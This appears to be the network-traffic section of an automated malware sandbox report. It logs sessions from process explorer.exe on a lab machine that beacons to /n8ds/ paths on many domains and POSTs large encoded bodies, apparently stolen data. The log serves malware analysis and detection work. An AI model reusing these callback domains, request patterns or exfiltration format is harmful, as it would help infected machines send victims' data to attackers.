                                                                                                                                                    Nov 29, 2021 14:11:17.180556059 CET7701OUTData Raw: 62 6d 59 66 54 73 73 6d 54 6a 36 61 41 75 4e 55 34 46 57 71 32 46 38 33 65 4c 2d 66 52 51 39 51 55 74 6a 71 4f 43 48 72 6a 70 47 55 6b 4b 51 28 68 4e 30 76 67 70 56 5a 50 68 73 4f 30 38 69 59 6f 4f 61 52 49 56 43 78 6b 48 4e 55 6d 54 41 6e 4e 4f
                                                                                                                                                    Data Ascii: bmYfTssmTj6aAuNU4FWq2F83eL-fRQ9QUtjqOCHrjpGUkKQ(hN0vgpVZPhsO08iYoOaRIVCxkHNUmTAnNOVGRiIA4cyAhwbCgCkUxMemO3r~KutMxkbK-E9jMzcE3eO~c(n1GyrEZuu4ju2GvNPL41J2zCLnoWm1YmjO_sB6Cths0pKv6IEIQ4a8h9jdGKJCU5zCh8BNQT0LIsaaSqcUA1-ti64Iz3r2cit6wCersWqZyWCR0x7
                                                                                                                                                    Nov 29, 2021 14:11:17.180915117 CET7705OUTData Raw: 6e 6e 6f 36 32 44 4f 51 6f 70 53 6c 6e 28 66 34 41 4c 37 4c 6c 62 47 47 35 41 76 4a 47 6c 31 72 41 53 4a 57 38 52 58 7a 52 66 34 70 54 79 30 72 32 49 6f 76 62 7a 71 7a 51 6f 4b 70 47 75 6d 51 37 6c 48 4c 7a 34 70 74 34 28 37 7a 5a 49 32 4c 4c 6e
                                                                                                                                                    Data Ascii: nno62DOQopSln(f4AL7LlbGG5AvJGl1rASJW8RXzRf4pTy0r2IovbzqzQoKpGumQ7lHLz4pt4(7zZI2LLnCp5dGBtl05B4m4Wt_uMsq6ZOMhOQM(1(cLvyaOf9Q4wTmOeqsEMhOuyR-O7So8kV3uHLQJ2ZQuup7W7picI0QMQ7iT531UJKhFSL8AO2jnZEGb1xW1tc4UgBezCpsPffhdh6IK6kUyWom5PaOMarMCYNb9-kwZ3SK
                                                                                                                                                    Nov 29, 2021 14:11:17.181092024 CET7715OUTData Raw: 49 58 48 55 6f 34 45 4b 42 5a 33 6b 66 6d 6c 37 49 4e 42 69 63 38 6a 36 69 45 4d 6a 6f 4c 5a 43 79 65 32 79 74 4b 70 50 43 4d 69 4c 68 6a 36 62 62 58 33 4e 4f 51 48 44 68 59 78 42 38 56 58 76 55 33 68 4e 55 6d 66 52 74 6c 63 45 55 6a 48 74 71 30
                                                                                                                                                    Data Ascii: IXHUo4EKBZ3kfml7INBic8j6iEMjoLZCye2ytKpPCMiLhj6bbX3NOQHDhYxB8VXvU3hNUmfRtlcEUjHtq0l8m~opsY5rOCxKGnozUde(BMJp4B4lvzf6KQe~rtfD0ngcV5yW4K2x0Vo22hiklwwb6eQ5QfNRNg6r5qtB65Rjq892TYCctIj7APq6EwZdQ1ykRx4iPo6c0zvDX9jNzHjN707B1M1H7wzmbrqv_ZjAXgbVmwMcHfD
                                                                                                                                                    Nov 29, 2021 14:11:17.181330919 CET7728OUTData Raw: 6c 42 42 42 6e 38 46 66 73 51 37 41 61 34 4d 4d 62 55 73 6e 43 34 50 37 69 51 32 7e 45 55 73 56 6c 46 41 75 30 52 41 45 51 31 7a 5a 5a 46 73 46 6a 28 46 38 4d 75 51 4f 71 4c 43 68 68 30 43 59 4e 30 66 67 36 7e 62 37 50 4b 32 47 37 47 41 44 57 6f
                                                                                                                                                    Data Ascii: lBBBn8FfsQ7Aa4MMbUsnC4P7iQ2~EUsVlFAu0RAEQ1zZZFsFj(F8MuQOqLChh0CYN0fg6~b7PK2G7GADWo5hOTblpVgRIl2VElUDkeRWkxNnhBaqg09vv5nYuKTSDnk8Jvln5x0a8MdJ5u_cBXzPDOSk7RpGFJ7SZRkn2gF8r49WIMcHfWDwWFJjiApQRqSr6G3JJHkNrZm5_zo(ePblF(UadEkvdez9LnM2WnEzbwo7oXpy8tb
Nov 29, 2021 14:11:17.467701912 CET | 7776 | IN | HTTP/1.1 404 Not Found
Date: Mon, 29 Nov 2021 13:11:16 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Tue, 23 Jul 2019 14:50:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 836
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
33 | 192.168.11.20 | 49847 | 216.172.172.87 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:11:17.042098045 CET | 7664 | OUT | GET /n8ds/?lZOD=3XBGTKX1IO0m2ps0OCefiLpUWq3mTk3XjxcX7A828ivUAOqw78DSKkuwDvhVWOojGfRi&3fVD2v=9rZXD0c8pBS HTTP/1.1
Host: www.dietatrintadias.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 29, 2021 14:11:17.251446009 CET | 7733 | IN | HTTP/1.1 404 Not Found
Date: Mon, 29 Nov 2021 13:11:17 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Tue, 23 Jul 2019 14:50:08 GMT
Accept-Ranges: bytes
Content-Length: 2361
Vary: Accept-Encoding
Content-Type: text/html
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x192"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120">
Nov 29, 2021 14:11:17.251508951 CET | 7734 | IN | Data Raw: 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 35 32 2e 70 6e 67 22
                                                                                                                                                    Data Ascii: <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-180.png" sizes="180x180"> <link href="/cgi-sys/css/bootstrap.min.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
34 | 192.168.11.20 | 49848 | 88.99.22.5 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:11:22.274576902 CET | 7779 | OUT | POST /n8ds/ HTTP/1.1
Host: www.helpcloud.xyz
Connection: close
Content-Length: 131142
Cache-Control: no-cache
Origin: http://www.helpcloud.xyz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.helpcloud.xyz/n8ds/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
mRQRNqXK36RsssR8qkymZPbkDSNKnZhHtgkv-M0RtJ4r-GcdL28OQ~EKOR1VMV2dKxCXZTPN3lbjYp1k3BpTnGN57jXMLpn(CrVze3Um8(R76WrkWENbs3X81OAYEWsne2tWNxGRptlC4Uw(FwPBAZjc4VIS2F_cD(3m7PBVG2BrrT0KZpCkfRiVg5vLTfOvB0xnSTXftUrRcXxBDimvIpke_ODDaZX5dXsuEJhvqjh~VEAZR5iZjyrneGGQHt1PpW_ib0LF6j2urMAZrc7SaVdiUMR33fcYoj5afZeza(Hyafu2VhF~9JtOuaB0lIlLasigUG5rT9Dvkdv0He2sfrLLAS67m35lxZWn-9uAkxWgGYNVdj30zC5g1qKGIL0iKQazDI9bEfQepqlp0nDaEPvQxljD9axmAt6skg7CGdPufZgjTMJbQo
                                                                                                                                                    Nov 29, 2021 14:11:22.274683952 CET7789OUTData Raw: 75 79 69 75 59 51 57 28 4c 73 4f 54 57 4c 39 45 4a 76 6b 73 69 4d 37 49 70 4b 6c 58 34 67 74 36 74 48 51 6c 56 43 46 66 4d 61 57 6f 70 4a 64 56 54 4a 42 4b 55 45 53 76 45 4f 55 53 72 62 41 74 62 56 74 6c 51 32 54 7a 39 37 6d 6e 2d 76 2d 67 4a 79
                                                                                                                                                    Data Ascii: uyiuYQW(LsOTWL9EJvksiM7IpKlX4gt6tHQlVCFfMaWopJdVTJBKUESvEOUSrbAtbVtlQ2Tz97mn-v-gJygRtrFoBwJplOncOEGCDHwV-op0rG8eijShKuJqmQcJVZn(FGhJc~vEoMvOALXthu5s8JTgn5snjxTxoPrpe7L(ArI5DgCm-FdvTfKeOo8cWSJiyPCDpsTla98c9zgYDZTe0ZM5qiqwolCq3ysIyjz(ndWW98H670D
Nov 29, 2021 14:11:22.289494038 CET | 7790 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 29 Nov 2021 13:11:22 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://www.helpcloud.xyz:443/n8ds/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
35 | 192.168.11.20 | 49849 | 88.99.22.5 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:11:22.290071011 CET | 7793 | OUT | GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl HTTP/1.1
Host: www.helpcloud.xyz
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 29, 2021 14:11:22.304858923 CET | 7794 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 29 Nov 2021 13:11:22 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://www.helpcloud.xyz:443/n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
36 | 192.168.11.20 | 49850 | 172.120.157.187 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:11:27.479099035 CET | 7801 | OUT | POST /n8ds/ HTTP/1.1
Host: www.stylesbykee.com
Connection: close
Content-Length: 131142
Cache-Control: no-cache
Origin: http://www.stylesbykee.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.stylesbykee.com/n8ds/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
37 | 192.168.11.20 | 49851 | 172.120.157.187 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:11:27.640578032 CET | 7824 | OUT | GET /n8ds/?lZOD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&3fVD2v=9rZXD0c8pBS HTTP/1.1
Host: www.stylesbykee.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 29, 2021 14:11:27.804884911 CET | 7867 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 29 Nov 2021 13:11:23 GMT
Content-Type: text/html
Content-Length: 801
Connection: close
Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></head><body><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
38 | 192.168.11.20 | 49852 | 66.29.140.185 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:11:38.023766994 CET | 7939 | OUT | POST /n8ds/ HTTP/1.1
Host: www.lopsrental.lease
Connection: close
Content-Length: 131142
Cache-Control: no-cache
Origin: http://www.lopsrental.lease
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.lopsrental.lease/n8ds/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Nov 29, 2021 14:11:38.795996904 CET | 8060 | IN | HTTP/1.1 404 Not Found
Date: Mon, 29 Nov 2021 13:11:38 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 282
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
39 | 192.168.11.20 | 49853 | 66.29.140.185 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:11:40.199002028 CET | 8061 | OUT | GET /n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&3fVD2v=9rZXD0c8pBS HTTP/1.1
Host: www.lopsrental.lease
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 29, 2021 14:11:40.430437088 CET | 8061 | IN | HTTP/1.1 404 Not Found
Date: Mon, 29 Nov 2021 13:11:40 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 282
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    4192.168.11.2049813199.59.242.15380C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:07:05.723401070 CET6403OUTGET /n8ds/?lZOD=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR&3fVD2v=9rZXD0c8pBS HTTP/1.1
                                                                                                                                                    Host: www.effective.store
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:07:05.817553043 CET | 6404 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:07:05 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Set-Cookie: parking_session=1e059a01-28a3-026a-59f1-9387c4644468; expires=Mon, 29-Nov-2021 13:22:05 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cQEwmA3wFWXVmWB3EA+VycihaTi1RXPdcnEx6ueo6CfFKKI8I5nvogkab/OQIYyRxzvtAyNfRA+5bWkM5l/SRw==
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                    Cache-Control: no-store, must-revalidate
                                                                                                                                                    Cache-Control: post-check=0, pre-check=0
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Data Ascii: 591<!doctype html><html lang="en" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cQEwmA3wFWXVmWB3EA+VycihaTi1RXPdcnEx6ueo6CfFKKI8I5nvogkab/OQIYyRxzvtAyNfRA+5bWkM5l/SRw=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="preconnect" href="https://www.google.com" crossorigin><link rel="dns-prefetch" href="https://parking.bodiscdn.com" crossorigin><link rel="dns-prefetch" href="https://fonts.googleapis.com" cross
                                                                                                                                                    Nov 29, 2021 14:07:05.817631960 CET | 6405 | IN
                                                                                                                                                    Data Ascii: origin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiMWUwNTlhMDEtMjhhMy0wMjZhLTU5ZjEtOTM4N2M0NjQ0NDY4IiwicGFnZV90aW1lIjoxNjM4MTkxMjI1LCJwYWdlX3VybCI6Imh0dHA6XC9cL3d3dy5lZmZlY3RpdmUuc3RvcmVcL244ZHNcLz
                                                                                                                                                    Nov 29, 2021 14:07:05.817682981 CET | 6405 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                    40 | 192.168.11.20 | 49854 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                    Nov 29, 2021 14:11:47.234215021 CET | 8064 | OUT | POST /n8ds/ HTTP/1.1
                                                                                                                                                    Host: www.mummymotors.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 131142
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.mummymotors.com
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://www.mummymotors.com/n8ds/
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Nov 29, 2021 14:11:47.404886007 CET | 8199 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:11:47 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 154
                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_DoZgPSk10aaiHf3kie/1tYxoMNLDLxmpbn0+w5n3KsKZrXQPAWaITkbhtz7G0bj3OzLqNxbyMokA2LYq0WCz7A
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                    41 | 192.168.11.20 | 49855 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                    Nov 29, 2021 14:11:47.246383905 CET | 8100 | OUT | GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=6hsdwDWbOloW+oddmH1y3GuNa2NTUXQYB9VwdvKa8csc++KRKb370Nh870wRdtnpcbjn HTTP/1.1
                                                                                                                                                    Host: www.mummymotors.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:11:47.354579926 CET | 8198 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:11:47 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 275
                                                                                                                                                    ETag: "6192576c-113"
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
42 | 192.168.11.20 | 49856 | 192.0.78.25 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:12:09.711518049 CET | 8201 | OUT | GET /n8ds/?B85P=7nvHaF&lZOD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 HTTP/1.1
                                                                                                                                                    Host: www.divorcefearfreedom.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
Nov 29, 2021 14:12:09.865227938 CET | 8201 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:12:09 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 162
                                                                                                                                                    Connection: close
                                                                                                                                                    Location: https://www.divorcefearfreedom.com/n8ds/?B85P=7nvHaF&lZOD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9
                                                                                                                                                    X-ac: 2.hhn _dca
                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
43 | 192.168.11.20 | 49857 | 38.143.25.232 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:12:15.069869041 CET | 8202 | OUT | GET /n8ds/?lZOD=YRa5YekRSAscu3KREIVoiFdBwJD7Q6+kwilTnNtYZuu2w/klC7MTP9008fix5v3TRxpN&B85P=7nvHaF HTTP/1.1
                                                                                                                                                    Host: www.reliablehomesellers.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
Nov 29, 2021 14:12:15.239454985 CET | 8203 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:12:15 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 162
                                                                                                                                                    Connection: close
                                                                                                                                                    Location: https://www.reliablehomesellers.com/n8ds/?lZOD=YRa5YekRSAscu3KREIVoiFdBwJD7Q6+kwilTnNtYZuu2w/klC7MTP9008fix5v3TRxpN&B85P=7nvHaF
                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
44 | 192.168.11.20 | 49859 | 185.61.153.97 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:12:30.467041016 CET | 8211 | OUT | GET /n8ds/?B85P=7nvHaF&lZOD=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1
                                                                                                                                                    Host: www.dif-directory.xyz
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
Nov 29, 2021 14:12:30.495929003 CET | 8212 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    content-type: text/html
                                                                                                                                                    content-length: 707
                                                                                                                                                    date: Mon, 29 Nov 2021 13:12:30 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    location: https://www.dif-directory.xyz/n8ds/?B85P=7nvHaF&lZOD=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                                                                                    referrer-policy: no-referrer-when-downgrade
                                                                                                                                                    connection: close
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
45 | 192.168.11.20 | 49860 | 172.67.201.232 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:12:35.517215014 CET | 8213 | OUT | GET /n8ds/?lZOD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&B85P=7nvHaF HTTP/1.1
                                                                                                                                                    Host: www.topwowshopping.store
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
Nov 29, 2021 14:12:35.698385954 CET | 8214 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:12:35 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    cache-control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0
                                                                                                                                                    expires: 0
                                                                                                                                                    last-modified: Mon, 29 Nov 2021 13:12:35 GMT
                                                                                                                                                    pragma: no-cache
                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vih0tsY4%2FyyqnkOqfOwNC6uGd%2FXb0bcfBv7j9zgq8DwIQJSkKhYl7xKGt1F24kkT10OiKghMq68juGm%2F2ZYMCNIMZtIM6Kqu5MB0yRAjy95aCUAIIHW2LXY1qmRy%2BNGkutk4mNHmPr6fSNw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 6b5c16a60bbd1f45-FRA
                                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a
                                                                                                                                                    Data Ascii: d404 Not Found
Nov 29, 2021 14:12:35.698400021 CET | 8214 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.11.20 | 49815 | 164.155.212.139 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:07:16.667834997 CET | 6413 | OUT | GET /n8ds/?lZOD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&3fVD2v=9rZXD0c8pBS HTTP/1.1
                                                                                                                                                    Host: www.ayudavida.com
                                                                                                                                                    Connection: close
